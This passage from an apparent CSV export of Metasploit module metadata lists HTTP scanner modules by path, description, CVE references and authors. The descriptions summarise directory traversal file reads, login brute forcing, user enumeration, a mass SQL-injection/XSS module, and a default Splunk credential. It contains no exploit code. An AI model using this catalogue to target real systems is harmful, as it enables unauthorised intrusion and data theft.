(BSD)","f",,,,"aggressive","t","CVE-1999-0502","hdm " 1495,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_put.rb","auxiliary","scanner/http/http_put","auxiliary/scanner/http/http_put","HTTP Writable Path PUT/DELETE File Access",300,"This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If filename isn't specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.","Metasploit Framework License (BSD)","f",,,"PUT","aggressive","t","OSVDB-397","CG , Kashif , sinn3r " 1496,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_traversal.rb","auxiliary","scanner/http/http_traversal","auxiliary/scanner/http/http_traversal","Generic HTTP Directory Traversal Utility",300,"This module allows you to test if a web server (or web application) is vulnerable to directory traversal with three different actions. The 'CHECK' action (default) is used to automatically (or manually) find if directory traversal exists in the web server, and then return the path that triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as 'CHECK', but will take advantage of the found trigger to download files based on a 'FILELIST' of your choosing. The 'PHPSOURCE' action can be used to download source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. To use the 'COOKIE' option, set your value like so: ""name=value"".","Metasploit Framework License (BSD)","f",,,"CHECK","aggressive","t",,"Ewerson Guimaraes(Crash) , Michael Messner , et , sinn3r " 1497,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_version.rb","auxiliary","scanner/http/http_version","auxiliary/scanner/http/http_version","HTTP Version Detection",300,"Display version information about each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1498,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/httpbl_lookup.rb","auxiliary","scanner/http/httpbl_lookup","auxiliary/scanner/http/httpbl_lookup","Http:BL Lookup",300,"This module can be used to enumerate information about an IP addresses from Project HoneyPot's HTTP Block List.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.projecthoneypot.org/httpbl_api.php","mubix " 1499,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/iis_internal_ip.rb","auxiliary","scanner/http/iis_internal_ip","auxiliary/scanner/http/iis_internal_ip","Microsoft IIS HTTP Internal IP Disclosure",300,"Collect any leaked internal IPs by requesting commonly redirected locs from IIS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Heather Pilkington" 1500,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/jboss_vulnscan.rb","auxiliary","scanner/http/jboss_vulnscan","auxiliary/scanner/http/jboss_vulnscan","JBoss Vulnerability Scanner",300,"This module scans a JBoss instance for a few vulnerablities.","BSD License","f",,,,"aggressive","t","CVE-2010-0738","Tyler Krpata" 1501,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_pages.rb","auxiliary","scanner/http/joomla_pages","auxiliary/scanner/http/joomla_pages","Joomla Page Scanner",300,"This module scans a Joomla install for common pages.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1502,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_plugins.rb","auxiliary","scanner/http/joomla_plugins","auxiliary/scanner/http/joomla_plugins","Joomla Plugins Scanner",300,"This module scans a Joomla install for plugins and potential vulnerabilities.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1503,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_version.rb","auxiliary","scanner/http/joomla_version","auxiliary/scanner/http/joomla_version","Joomla Version Scanner",300,"This module scans a Joomla install for information about the underlying operating system and Joomla version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1504,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb","auxiliary","scanner/http/linksys_e1500_traversal","auxiliary/scanner/http/linksys_e1500_traversal","Linksys E1500 Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerability which is present in different Linksys home routers, like the E1500.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57760, EDB-24475, OSVDB-89911, URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner " 1505,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb","auxiliary","scanner/http/litespeed_source_disclosure","auxiliary/scanner/http/litespeed_source_disclosure","LiteSpeed Source Code Disclosure/Download",300,"This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-40815, CVE-2010-2333, EDB-13850, OSVDB-65476","Kingcope, xanda" 1506,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/lucky_punch.rb","auxiliary","scanner/http/lucky_punch","auxiliary/scanner/http/lucky_punch","HTTP Microsoft SQL Injection Table XSS Infection",300,"This module implements the mass SQL injection attack in use lately by concatenation of HTML string that forces a persistant XSS attack to redirect user browser to a attacker controller website.","BSD License","f",,,,"aggressive","t",,"et " 1507,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb","auxiliary","scanner/http/majordomo2_directory_traversal","auxiliary/scanner/http/majordomo2_directory_traversal","Majordomo2 _list_file_get() Directory Traversal",300,"This module exploits a directory traversal vulnerability present in the _list_file_get() function of Majordomo2 (help function). By default, this module will attempt to download the Majordomo config.pl file.","Metasploit Framework License (BSD)","f","2011-03-08 00:00:00",,,"aggressive","t","CVE-2011-0049, CVE-2011-0063, EDB-16103, OSVDB-70762, URL-http://sotiriu.de/adv/NSOADV-2011-003.txt, URL-https://sitewat.ch/en/Advisory/View/1","Nikolas Sotiriu" 1508,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb","auxiliary","scanner/http/manageengine_deviceexpert_traversal","auxiliary/scanner/http/manageengine_deviceexpert_traversal","ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal",300,"This module exploits a directory traversal vulnerability found in ManageEngine DeviceExpert's ScheduleResultViewer Servlet. This is done by using ""..\..\..\..\..\..\..\..\..\..\"" in the path in order to retrieve a file on a vulnerable machine. Please note that the SSL option is required in order to send HTTP requests.","Metasploit Framework License (BSD)","f","2012-03-18 00:00:00",,,"aggressive","t","OSVDB-80262, URL-http://retrogod.altervista.org/9sg_me_adv.htm","rgod, sinn3r " 1509,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb","auxiliary","scanner/http/manageengine_securitymanager_traversal","auxiliary/scanner/http/manageengine_securitymanager_traversal","ManageEngine SecurityManager Plus 5.5 Directory Traversal",300,"This module exploits a directory traversal flaw found in ManageEngine SecurityManager Plus 5.5 or less. When handling a file download request, the DownloadServlet class fails to properly check the 'f' parameter, which can be abused to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-19 00:00:00",,,"aggressive","t","EDB-22092, OSVDB-86563","blkhtc0rp, sinn3r " 1510,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb","auxiliary","scanner/http/mediawiki_svg_fileaccess","auxiliary/scanner/http/mediawiki_svg_fileaccess","MediaWiki SVG XML Entity Expansion Remote File Access",300,"This module attempts to read a remote file from the server using a vulnerability in the way MediaWiki handles SVG files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. In order to work MediaWiki must be configured to accept upload of SVG files. If anonymous uploads are allowed the username and password aren't required, otherwise they are. This module has been tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10. Older versions were also tested but do not seem to be vulnerable to this vulnerability. The following MediaWiki requirements must be met: File upload must be enabled, $wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something other than 'false'.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-92490, URL-http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229, URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=46859","Christian Mehlmauer, Daniel Franke, juan vazquez " 1511,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mod_negotiation_brute.rb","auxiliary","scanner/http/mod_negotiation_brute","auxiliary/scanner/http/mod_negotiation_brute","Apache HTTPD mod_negotiation Filename Bruter",300,"This module performs a brute force attack in order to discover existing files on a server which uses mod_negotiation. If the filename is found, the IP address and the files found will be displayed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"diablohorn " 1512,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb","auxiliary","scanner/http/mod_negotiation_scanner","auxiliary/scanner/http/mod_negotiation_scanner","Apache HTTPD mod_negotiation Scanner",300,"This module scans the webserver of the given host(s) for the existence of mod_negotiate. If the webserver has mod_negotiation enabled, the IP address will be displayed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"diablohorn " 1513,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb","auxiliary","scanner/http/ms09_020_webdav_unicode_bypass","auxiliary/scanner/http/ms09_020_webdav_unicode_bypass","MS09-020 IIS6 WebDAV Unicode Authentication Bypass",300,"This module attempts to to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-34993, CVE-2009-1122, CVE-2009-1535, MSB-MS09-020, OSVDB-54555","et , patrick " 1514,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/netdecision_traversal.rb","auxiliary","scanner/http/netdecision_traversal","auxiliary/scanner/http/netdecision_traversal","NetDecision NOCVision Server Directory Traversal",300,"This module exploits a directory traversal bug in NetDecision's TrafficGrapherServer.exe service. This is done by using ""...\"" in the path to retrieve a file on a vulnerable machine.","Metasploit Framework License (BSD)","f","2012-03-07 00:00:00",,,"aggressive","t","OSVDB-79863, URL-http://aluigi.altervista.org/adv/netdecision_1-adv.txt","Luigi Auriemma, sinn3r " 1515,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb","auxiliary","scanner/http/netgear_sph200d_traversal","auxiliary/scanner/http/netgear_sph200d_traversal","Netgear SPH200D Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerablity which is present in Netgear SPH200D Skype telephone.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57660, EDB-24441, URL-http://support.netgear.com/product/SPH200D, URL-http://www.s3cur1ty.de/m1adv2013-002","Michael Messner " 1516,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/nginx_source_disclosure.rb","auxiliary","scanner/http/nginx_source_disclosure","auxiliary/scanner/http/nginx_source_disclosure","Nginx Source Code Disclosure/Download",300,"This module exploits a source code disclosure/download vulnerability in versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40 correct this vulnerability.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-40760, CVE-2010-2263, EDB-13818, EDB-13822, OSVDB-65531","Alligator Security Team, Tiago Ferreira " 1517,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb","auxiliary","scanner/http/novell_file_reporter_fsfui_fileaccess","auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess","NFR Agent FSFUI Record Arbitrary Remote File Access",300,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary text files via a directory traversal while handling requests to /FSF/CMD with an FSFUI record with UICMD 126. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4958, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1518,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb","auxiliary","scanner/http/novell_file_reporter_srs_fileaccess","auxiliary/scanner/http/novell_file_reporter_srs_fileaccess","NFR Agent SRS Record Arbitrary Remote File Access",300,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4957, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1519,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/open_proxy.rb","auxiliary","scanner/http/open_proxy","auxiliary/scanner/http/open_proxy","HTTP Open Proxy Detection",300,"Checks if an HTTP proxy is open. False positive are avoided verifing the HTTP return code and matching a pattern.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Open_proxy, URL-http://nmap.org/svn/scripts/http-open-proxy.nse","Matteo Cantoni " 1520,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/options.rb","auxiliary","scanner/http/options","auxiliary/scanner/http/options","HTTP Options Detection",300,"Display available HTTP options for each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-11604, BID-9506, BID-9561, CVE-2005-3398, CVE-2005-3498, OSVDB-877","CG " 1521,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/owa_login.rb","auxiliary","scanner/http/owa_login","auxiliary/scanner/http/owa_login","Outlook Web App (OWA) Brute Force Utility",300,"This module tests credentials on OWA 2003, 2007 and 2010 servers. The default action is set to OWA 2010.","Metasploit Framework License (BSD)","f",,,"OWA 2010","aggressive","t",,"SecureState R&D Team, Spencer McIntyre, Vitor Moreira, sinn3r " 1522,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb","auxiliary","scanner/http/prev_dir_same_name_file","auxiliary/scanner/http/prev_dir_same_name_file","HTTP Previous Directory File Scanner",300,"This module identifies files in the first parent directory with same name as the given directory path. Example: Test /backup/files/ will look for the following files /backup/files.ext .","BSD License","f",,,,"aggressive","t",,"et " 1523,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb","auxiliary","scanner/http/rails_json_yaml_scanner","auxiliary/scanner/http/rails_json_yaml_scanner","Ruby on Rails JSON Processor YAML Deserialization Scanner",300,"This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-0333","hdm , jjarmoc" 1524,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_mass_assignment.rb","auxiliary","scanner/http/rails_mass_assignment","auxiliary/scanner/http/rails_mass_assignment","Ruby On Rails Attributes Mass Assignment Scanner",300,"This module scans Ruby On Rails sites for models with attributes not protected by attr_protected or attr_accessible. After attempting to assign a non-existent field, the default rails with active_record setup will raise an ActiveRecord::UnknownAttributeError exeption, and reply with HTTP code 500.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://guides.rubyonrails.org/security.html#mass-assignment","Gregory Man " 1525,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb","auxiliary","scanner/http/rails_xml_yaml_scanner","auxiliary/scanner/http/rails_xml_yaml_scanner","Ruby on Rails XML Processor YAML Deserialization Scanner",300,"This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the XML request processor.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-0156, URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156","hdm , jjarmoc" 1526,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/replace_ext.rb","auxiliary","scanner/http/replace_ext","auxiliary/scanner/http/replace_ext","HTTP File Extension Scanner",300,"This module identifies the existence of additional files by modifying the extension of an existing file.","BSD License","f",,,,"aggressive","t",,"et " 1527,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb","auxiliary","scanner/http/rewrite_proxy_bypass","auxiliary/scanner/http/rewrite_proxy_bypass","Apache Reverse Proxy Bypass Vulnerability Scanner",300,"Scan for poorly configured reverse proxy servers. By default, this module attempts to force the server to make a request with an invalid domain name. Then, if the bypass is successful, the server will look it up and of course fail, then responding with a status code 502. A baseline status code is always established and if that baseline matches your test status code, the injection attempt does not occur. ""set VERBOSE true"" if you are paranoid and want to catch potential false negatives. Works best against Apache and mod_rewrite","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-3368, URL-http://www.contextis.com/research/blog/reverseproxybypass/","chao-mu" 1528,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/robots_txt.rb","auxiliary","scanner/http/robots_txt","auxiliary/scanner/http/robots_txt","HTTP Robots.txt Content Scanner",300,"Detect robots.txt files and analize its content","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1529,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/s40_traversal.rb","auxiliary","scanner/http/s40_traversal","auxiliary/scanner/http/s40_traversal","S40 0.4.2 CMS Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerability found in S40 CMS. The flaw is due to the 'page' function not properly handling the $pid parameter, which allows a malicious user to load an arbitrary file path.","Metasploit Framework License (BSD)","f","2011-04-07 00:00:00",,,"aggressive","t","EDB-17129, OSVDB-82469","Osirys , sinn3r " 1530,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb","auxiliary","scanner/http/sap_businessobjects_user_brute","auxiliary/scanner/http/sap_businessobjects_user_brute","SAP BusinessObjects User Bruteforcer",300,"This module attempts to bruteforce SAP BusinessObjects users. The dswsbobje interface is only used to verify valid credentials for CmcApp. Therefore, any valid credentials that have been identified can be leveraged by logging into CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1531,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb","auxiliary","scanner/http/sap_businessobjects_user_brute_web","auxiliary/scanner/http/sap_businessobjects_user_brute_web","SAP BusinessObjects Web User Bruteforcer",300,"This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1532,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb","auxiliary","scanner/http/sap_businessobjects_user_enum","auxiliary/scanner/http/sap_businessobjects_user_enum","SAP BusinessObjects User Enumeration",300,"This module simply attempts to enumerate SAP BusinessObjects users.The dswsbobje interface is only used to verify valid users for CmcApp. Therefore, any valid users that have been identified can be leveraged by logging into CmcApp.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1533,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb","auxiliary","scanner/http/sap_businessobjects_version_enum","auxiliary/scanner/http/sap_businessobjects_version_enum","SAP BusinessObjects Version Detection",300,"This module simply attempts to identify the version of SAP BusinessObjects.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf","Joshua Abraham " 1534,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/scraper.rb","auxiliary","scanner/http/scraper","auxiliary/scanner/http/scraper","HTTP Page Scraper",300,"Scrap defined data from a specific web page based on a regular expresion","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1535,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/simple_webserver_traversal.rb","auxiliary","scanner/http/simple_webserver_traversal","auxiliary/scanner/http/simple_webserver_traversal","Simple Web Server 2.3-RC1 Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Simple Web Server 2.3-RC1.","Metasploit Framework License (BSD)","f","2013-01-03 00:00:00",,,"aggressive","t","EDB-23886, OSVDB-88877, URL-http://seclists.org/bugtraq/2013/Jan/12","CwG GeNiuS, sinn3r " 1536,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/soap_xml.rb","auxiliary","scanner/http/soap_xml","auxiliary/scanner/http/soap_xml","HTTP SOAP Verb/Noun Brute Force Scanner",300,"This module attempts to brute force SOAP/XML requests to uncover hidden methods.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"patrick " 1537,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sockso_traversal.rb","auxiliary","scanner/http/sockso_traversal","auxiliary/scanner/http/sockso_traversal","Sockso Music Host Server 1.5 Directory Traversal",300,"This module exploits a directory traversal bug in Sockso on port 4444. This is done by using ""../"" in the path to retrieve a file on a vulnerable machine.","Metasploit Framework License (BSD)","f","2012-03-14 00:00:00",,,"aggressive","t","URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt","Luigi Auriemma, sinn3r " 1538,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/splunk_web_login.rb","auxiliary","scanner/http/splunk_web_login","auxiliary/scanner/http/splunk_web_login","Splunk Web interface Login Utility",300,"This module simply attempts to login to a Splunk web interface. Please note the free version of Splunk actually does not require any authentication, in that case the module will abort trying. Also, some Splunk applications still have the default credential 'admin:changeme' written on the login page. If this default credential is found, the module will also store that information, and then move on to trying more passwords.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak , sinn3r " 1539,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sqlmap.rb","auxiliary","scanner/http/sqlmap","auxiliary/scanner/http/sqlmap","SQLMAP SQL Injection External Module",300,"This module launch a sqlmap session. sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.","BSD License","f",,,,"aggressive","t","URL-http://sqlmap.sourceforge.net","Bernardo Damele A. G. " 1540,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/squid_pivot_scanning.rb","auxiliary","scanner/http/squid_pivot_scanning","auxiliary/scanner/http/squid_pivot_scanning","Squid Proxy Port Scanner",300,"A misconfigured Squid proxy can allow an attacker to make requests on his behalf. This may give the attacker information about devices that he cannot reach but the Squid proxy can. For example, an attacker can make requests for internal IP addresses against a misconfigurated open Squid proxy exposed to the Internet, therefore performing an internal port scan. The error messages returned by the proxy are used to determine if the port is open or not. Many Squid proxies use custom error codes so your mileage may vary. The open_proxy module can be used to test for open proxies, though a Squid proxy does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attack to pivot to another part of the network).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"willis" 1541,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb","auxiliary","scanner/http/squiz_matrix_user_enum","auxiliary/scanner/http/squiz_matrix_user_enum","Squiz Matrix User Enumeration Scanner",300,"This module attempts to enumernate remote users that exist within the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs e.g. ?a=14 and searching for a valid username eg ""~root"" or ""~test"" which is prefixed by a ""~"" in the response. It will also try to GET the users full name or description, or other information. You may wish to modify ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE. Information gathered may be used for later bruteforce attacks.","Metasploit Framework License (BSD)","f","2011-11-08 00:00:00",,,"aggressive","t","URL-http://www.osisecurity.com.au/advisories/","Troy Rose , patrick " 1542,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ssl.rb","auxiliary","scanner/http/ssl","auxiliary/scanner/http/ssl","HTTP SSL Certificate Information",300,"Parse the server SSL certificate to obtain the common name and signature algorithm","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Chris John Riley, Veit Hailperin , et " 1543,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/svn_scanner.rb","auxiliary","scanner/http/svn_scanner","auxiliary/scanner/http/svn_scanner","HTTP Subversion Scanner",300,"Detect subversion directories and files and analize its content. Only SVN Version > 7 supported","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1544,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb","auxiliary","scanner/http/svn_wcdb_scanner","auxiliary/scanner/http/svn_wcdb_scanner","SVN wc.db Scanner",300,"Scan for servers that allow access to the SVN wc.db file. Based on the work by Tim Meddin.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#","Stephen Haywood " 1545,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb","auxiliary","scanner/http/sybase_easerver_traversal","auxiliary/scanner/http/sybase_easerver_traversal","Sybase Easerver 6.3 Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Sybase EAserver's Jetty webserver on port 8000. Code execution seems unlikely with EAserver's default configuration unless the web server allows WRITE permission.","Metasploit Framework License (BSD)","f","2011-05-25 00:00:00",,,"aggressive","t","CVE-2011-2474, OSVDB-72498, URL-http://www.sybase.com/detail?id=1093216, URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=912","Sow Ching Shiong, sinn3r " 1546,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb","auxiliary","scanner/http/symantec_brightmail_logfile","auxiliary/scanner/http/symantec_brightmail_logfile","Symantec Messaging Gateway 9.5 Log File Download Vulnerability",300,"This module will download a file of your choice against Symantec Messaging Gateway. This is possible by exploiting a directory traversal vulnerability when handling the 'logFile' parameter, which will load an arbitrary file as an attachment. Note that authentication is required in order to successfully download your file.","Metasploit Framework License (BSD)","f","2012-11-30 00:00:00",,,"aggressive","t","BID-56789, CVE-2012-4347, EDB-23110, OSVDB-88165, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00","Ben Williams , sinn3r " 1547,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb","auxiliary","scanner/http/titan_ftp_admin_pwd","auxiliary/scanner/http/titan_ftp_admin_pwd","Titan FTP Administrative Password Disclosure",300,"On Titan FTP servers prior to version 9.14.1628, an attacker can retrieve the username and password for the administrative XML-RPC interface, which listens on TCP Port 31001 by default, by sending an XML request containing bogus authentication information. After sending this request, the server responds with the legitimate username and password for the service. With this information, an attacker has complete control over the FTP service, which includes the ability to add and remove FTP users, as well as add, remove, and modify available directories and their permissions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1625","Spencer McIntyre" 1548,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tomcat_enum.rb","auxiliary","scanner/http/tomcat_enum","auxiliary/scanner/http/tomcat_enum","Apache Tomcat User Enumeration",300,"Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-35196, CVE-2009-0580, OSVDB-55055","Alligator Security Team, Heyder Andrade , Leandro 